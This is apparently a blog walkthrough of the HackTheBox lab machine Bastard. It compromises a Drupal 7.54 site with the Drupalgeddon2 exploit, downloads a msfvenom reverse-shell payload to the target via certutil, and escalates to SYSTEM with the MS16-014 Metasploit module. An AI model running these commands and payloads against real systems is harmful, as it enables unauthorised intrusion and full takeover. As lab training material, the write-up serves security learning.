Bastard HackTheBox WalkThrough

This is Bastard HackTheBox machine walkthrough and it is also 6th machine of our OSCP like HTB boxes series. In this writeup, I have demonstrated step-by-step how I rooted to Bastard HTB machine.

Before starting let us know something about this machine. It is a Windows machine with IP address 10.10.10.9 and difficulty medium assigned by its maker. This machine is currently retired so you will require VIP subscription at hackthebox.eu to access this machine. Before starting, connect your PC with VPN and make sure your connectivity with Bastard machine by pinging the IP 10.10.10.9. If all goes correct then start hacking. As usual I started by scanning the machine. I used Nmap [a popular port scanner] for this task and the result is below-

Scanning

$ nmap -sC -sV -oN bastard.nmap 10.10.10.9

Nmap Scan report of Bastard HackTheBox WalkThrough

Nmap revealed that port 80135 and 49154 are open. Microsoft IIS 7 web server on port 80, Microsoft RPC service on port 135 49154 are running. Nmap script http-generator revealed that the website is made up of Drupal CMS [Drupal is a Content Management System as we have WordPress] and its version is 7. Soon I get any software and its version then immediately I search for public exploit using searchsploit. Searchsploit listed many number of potential exploits. However, the problem is that, there are many numbers of exploits and we do not know which exploit will surely work. For filtering the most appropriate one, I had to know the exact version of the Drupal, which is running on port 80. After some googling, found this answer from stackoverflow

How to find installed version of drupal answer from stackoverflow

Ongoing to http://10.10.10.9/CHANGELOG.txt URL found that the installed version is 7.54.

Changelog.txt file of Bastard HackTheBox found during  WalkThrough

Then again queried through searchsploit and this time it found 8 potential exploits.

$ searchsploit drupal 7.54

Searching  exploit through SearchSploit in Bastard HackTheBox WalkThrough

After trying each of them, I found only 44449.rb worked for me. For more info about this exploit, you can check here. Then, mirrored the exploit to my current directory using -m switch of searchsploit.

$ searchsploit -m php/webapps/44449.rb

Downloading Ruby exploit to the current directory

Currently file 44449.rb is in DOS form so converted it into UNIX format using the command dos2unix.

$ dos2unix 44449.rb

Converting DOS file format to UNIX file format using Dos2unix tool

Ran this exploit to get user shell.

Getting User Shell

$ ruby 44449.rb http://10.10.10.9
drupalgeddon2 >> whoami

Note: If you get error as shown in the screenshot. This error is due to a missing a gem named highline, in your gem directory. Therefore, to solve this problem you have to install this gem using the command $sudo gem install highline

Getting user shell through the exploit in Bastard HackTheBox WalkThrough

We got a user shell by the user named iusr. Right now, we are in a fake cmd shell, which has limited functionality, and we cannot capture user flag because this shell restricts the execution of type command. So, I upgraded the shell to meterpreter shell by dropping a payload created through msfvenominto bastard machine and then getting meterpreter shell back on my listener in msfconsole.

Upgrading Shell

$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.8 LPORT=4321 -f exe>shell.exe  # This will create an exe payload on our local PC
$ python3 -m http.server 80  //Start python http server to host this shell.exe file
drupalgeddon2>>certutil.exe -urlcache -split -f "http://10.10.14.8/shell.exe" shell.exe # This will download the payload to bastard machine.

Creating and downloading Meterpreter payload to bastard machine

Started the listener on msfconsole to get the reverse shell back
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 10.10.14.8
msf5 exploit(multi/handler) > set LPORT 4321
msf5 exploit(multi/handler) > exploit
meterpreter > sysinfo

Upgrading shell to meterpreter shell

We have successfully upgraded our shell to meterpreter shell. Now we have many options to play with our meterpreter shell.

Capture User Flag

meterpreter > cat 'C:\Users\dimitris\Desktop\user.txt'

User flag captured during Bastard HackTheBox WalkThrough

Privilege Escalation

To escalate the privilege to admin we have to first find a privilege escalation vector. Then using that PrivEsc vector we will exploit, to get admin privilege shell. To find PrivEsc vector I ran the post exploitation module post/multi/recon/local_exploit_suggester, which gathers all the exploit modules that can be used to escalate privilege. Basically, it will enumerate all the potential Kernel Exploits whose patch is not installed in the Bastard Machine.

Finding PrivEsc Vector

meterpreter > run post/multi/recon/local_exploit_suggester

Running local exploit suggester to enumerate available Kernel exploit

Local Exploit Suggester gave 5 exploits that can be used to get admin shell. I tried each of them one by one and only exploit/windows/local/ms16_014_wmi_recv_notif module worked. So here, our PrivEsc vector is a Kernel Exploit.

Getting Root Shell

meterpreter > background
msf5 exploit(multi/handler) > use exploit/windows/local/ms16_014_wmi_recv_notif
msf5 exploit(windows/local/ms16_014_wmi_recv_notif)> set SESSION 1
msf5 exploit(windows/local/ms16_014_wmi_recv_notif)> set LHOST 10.10.14.8
msf5 exploit(windows/local/ms16_014_wmi_recv_notif)> exploit
meterpreter > getuid

Privilege escalation in Bastard HackTheBox

We are NT AUTHORITY\SYSTEM. Let us capture root flag.

Capture Root Flag

meterpreter > cat /Users/Administrator/Desktop/root.txt.txt

Root flag captured during bastard hackthebox walkthrough

This was how I rooted Bastard HackTheBox machine. Learnt a lot after hunting this box. Hope you people have also learnt some new things from this box. Thanks for reading this writeup. Write your experience in the comment section. For any suggestion and query related to walkthrough feel free to write us at [email protected].

Next machine walkthrough is Arctic.

Leave a Reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.

Deepak Kumar Maurya

Hi everyone, I am Deepak Kumar Maurya, creator of Ethicalhacs.com. I am a Computer Science student. I like to share my knowledge of hacking with others. I used to write walkthrough on different challenges of HackTheBox & DVWA . In part time I do bug bounty hunting and penetration testing on websites.